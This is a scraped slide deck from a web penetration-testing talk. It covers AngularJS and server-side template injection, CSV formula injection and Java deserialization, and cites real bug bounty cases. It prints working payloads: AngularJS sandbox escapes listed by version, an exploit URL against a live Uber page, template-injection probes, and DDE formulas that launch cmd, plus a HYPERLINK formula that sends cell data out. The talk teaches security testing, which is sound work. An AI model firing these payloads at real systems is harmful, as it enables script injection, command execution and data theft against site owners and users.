Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Download as PPTX, PDF1 like1,490 views
1) The document discusses several vulnerabilities in modern web applications including AngularJS template injection, server-side template injection in frameworks like Smarty and Twig, CSV injection, and Java object deserialization vulnerabilities. 2) It provides details on detecting and exploiting these vulnerabilities with examples of payloads and real-world cases that have been discovered. 3) The document includes demonstrations of exploiting template injection in Piwik and AngularJS, server-side template injection in Flask and Alfresco, and Java deserialization in applications like JBoss and Jenkins.
![The payloads…
• 1.0.1 - 1.1.5
• {{constructor.constructor('alert(1)')()}}
• 1.2.0 - 1.2.1
• {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getP
rototypeOf(a.sub),a).value,0,'alert(1)')()}}
• ….
• 1.4.0 - 1.4.9
• {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
• 1.5.0-rc2 Fixed](https://image.slidesharecdn.com/nguyenphuongtruonganh-webpentestpart1-160910100733/85/Nguyen-Phuong-Truong-Anh-Some-new-vulnerabilities-in-modern-web-application-8-320.jpg)
![AngularJS injection in the wild (2)
• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}
• Response: wrtz49 Vulnerable
• Exploit: https://developer.uber.com/docs/deep-
linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnProper
tyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz](https://image.slidesharecdn.com/nguyenphuongtruonganh-webpentestpart1-160910100733/85/Nguyen-Phuong-Truong-Anh-Some-new-vulnerabilities-in-modern-web-application-10-320.jpg)
![Introduction (1)
• $output = $twig->render("Dear {first_name},", array("first_name" =>
$user.first_name) ); Not vulnerable
• $output = $twig->render($_GET['custom_email'], array("first_name"
=> $user.first_name) ); ???](https://image.slidesharecdn.com/nguyenphuongtruonganh-webpentestpart1-160910100733/85/Nguyen-Phuong-Truong-Anh-Some-new-vulnerabilities-in-modern-web-application-17-320.jpg)
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
- 1. Some new vulnerabilities in modern web application (Part 1) hkln1 (@anh_npt)
- 2. Xin cảm ơn các nhà tài trợ
- 3. AngularJS Template Injection (Client-site template injection)
- 4. What is AngularJS ? • Popular MVC JavaScript Framework • Maintained and recommended by Google • Read more: • https://docs.angularjs.org/tutorial
- 5. What’s risk ? (1) Not vulnerable
- 6. What’s risk ? (2) ???
- 7. Four general attack vectors 1. Attacking the Sandbox 2. Attacking the Sanitizer 3. Attacking the CSP Mode 4. Attacking the Codebase
- 8. The payloads… • 1.0.1 - 1.1.5 • {{constructor.constructor('alert(1)')()}} • 1.2.0 - 1.2.1 • {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getP rototypeOf(a.sub),a).value,0,'alert(1)')()}} • …. • 1.4.0 - 1.4.9 • {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} • 1.5.0-rc2 Fixed
- 9. AngularJS injection in the wild (1) • https://hackerone.com/reports/125027
- 10. AngularJS injection in the wild (2) • Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}} • Response: wrtz49 Vulnerable • Exploit: https://developer.uber.com/docs/deep- linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnProper tyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz
- 11. Demo • Piwik
- 14. What is template engine? (1) • Present dynamic data via web pages and emails. • Separation of presentation (HTML/CSS) from application logic. • Used in wikis, blogs, marketing applications and CMS. • Some template engines: • FreeMarker • Velocity • Smarty • Twig • Jade
- 15. What is template engine? (2) <?php echo $param ?> <?php echo htmlspecialchars($var, ENT_QUOTES, ‘UTF-8’) ?> {{ param }} {{ param | escape}} / {{ param | e}}
- 16. What’s risk ? • Not only XSS Remote Code Execution (RCE) • Arbitrary object creation • Arbitrary file read/write • Remote file include • Information disclosure and privilege escalation
- 17. Introduction (1) • $output = $twig->render("Dear {first_name},", array("first_name" => $user.first_name) ); Not vulnerable • $output = $twig->render($_GET['custom_email'], array("first_name" => $user.first_name) ); ???
- 18. Introduction (2) • custom_email={{7*7}} 49 • custom_email={{self}} Object of class __TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78d b3538221c1145580ca4a5 could not be converted to string
- 20. Detect (1) • Plaintext context smarty= Hello {user.name} Hello user1 freemarker= Hello ${username} Hello user1 any= <b> Hello </b> <b> Hello </b> smarty= Hello ${7*7} Hello 49 freemarker= Hello ${7*7} Hello 49
- 21. Detect (2) • Code context Personal_greeting = username Hello user1 Personal_greeting = username<tag> Hello Personal_greeting = username }} <tag> Hello user01 <tag>
- 22. Identify
- 23. Exploit • ‘For Template Authors’ - sections covering basic syntax. • ‘Security Considerations’ - chances are whoever developed the app you're testing didn't read this, and it may contain some useful hints. • Lists of builtin methods, functions, filters, and variables. • Lists of extensions/plugins - some may be enabled by default.
- 28. Payloads: Twig
- 30. Payloads: Jade
- 32. Server-side template injection in the wild • https://hackerone.com/reports/125980
- 34. Reference • http://blog.portswigger.net/2015/08/server-side-template- injection.html • https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/ • https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2- part-ii •
- 35. Fomular Injection (CSV Injection)
- 36. What is CSV Injection ? • Exploit via the export functionality that allow user to download CSV (Excel) file. • Often contain input from untrusted sources such as survey responses, transaction details, and user-supplied addresses, … • The attacker can execute any commands on user machine if web application does not properly validate the contents of the CSV file.
- 37. How to test? • =1 + 1 2 • -2 + 3 1 • +3 + 5 8
- 38. The payloads… • =HYPERLINK(https://example.com?test=&A1&A2,”Error: please click for further information”) • =DDE(“cmd”;”/C calc”; “DdeLink_60_870516294”) • =cmd | ‘ /C calc ‘ !A0
- 39. CSV Injection in the wild
- 41. Reference • https://www.owasp.org/index.php/CSV_Excel_Macro_Injection • https://hackerone.com/reports/72785 • http://www.contextis.com/resources/blog/comma-separated- vulnerabilities/
- 43. What is serialization ?
- 44. What is serialization ? (2)
- 45. More complex serialization… (1)
- 46. More complex serialization… (2)
- 47. Serialization in the context of Java web applications and application servers • In HTTP requests – Parameters, ViewState, Cookies • RMI – The extensively used Java RMI protocol • RMI over HTTP – Many Java thick client web apps use this • JMX • Custom Protocols
- 48. What’s problems ? • What if we knew of an object that implemented a “readObject” method that did something dangerous ? • What if instead of appending an exclamation point to a user defined string ?
- 49. How to identify wherever an application might be vulnerable ?
- 50. Java deserialization vulnerability in the wild • http://artsploit.blogspot.com/2016/01/paypal-rce.html
- 51. Analysis of exploiting the real cases – Jboss application (1) 1. Identify
- 52. Analysis of exploiting the real cases – Jboss application (2) 1. Exploit
- 53. Demo
- 54. Analysis of exploiting the real cases – Jenkins application (1) 1. Vulnerability Detection
- 55. Analysis of exploiting the real cases – Jenkins application (2) 1. Vulnerability Detection
- 56. Analysis of exploiting the real cases – Jenkins application (3) 1. Vulnerability Detection
- 57. Analysis of exploiting the real cases – Jenkins application (3) 2. Exploit Development
- 58. Analysis of exploiting the real cases – Jenkins application (3) 2. Exploit Development
- 59. Analysis of exploiting the real cases – Jenkins application (3) 2. Exploit Development
- 60. Analysis of exploiting the real cases – Jenkins application (4) 2. Exploit Development
- 61. Analysis of exploiting the real cases – Jenkins application (5) 2. Exploit Development
- 62. Demo
- 63. Reference • https://foxglovesecurity.com/2015/11/06/what-do-weblogic- websphere-jboss-jenkins-opennms-and-your-application-have-in- common-this-vulnerability/ • http://www.slideshare.net/frohoff1/appseccali-2015-marshalling- pickles • https://www.youtube.com/watch?v=VviY3O-euVQ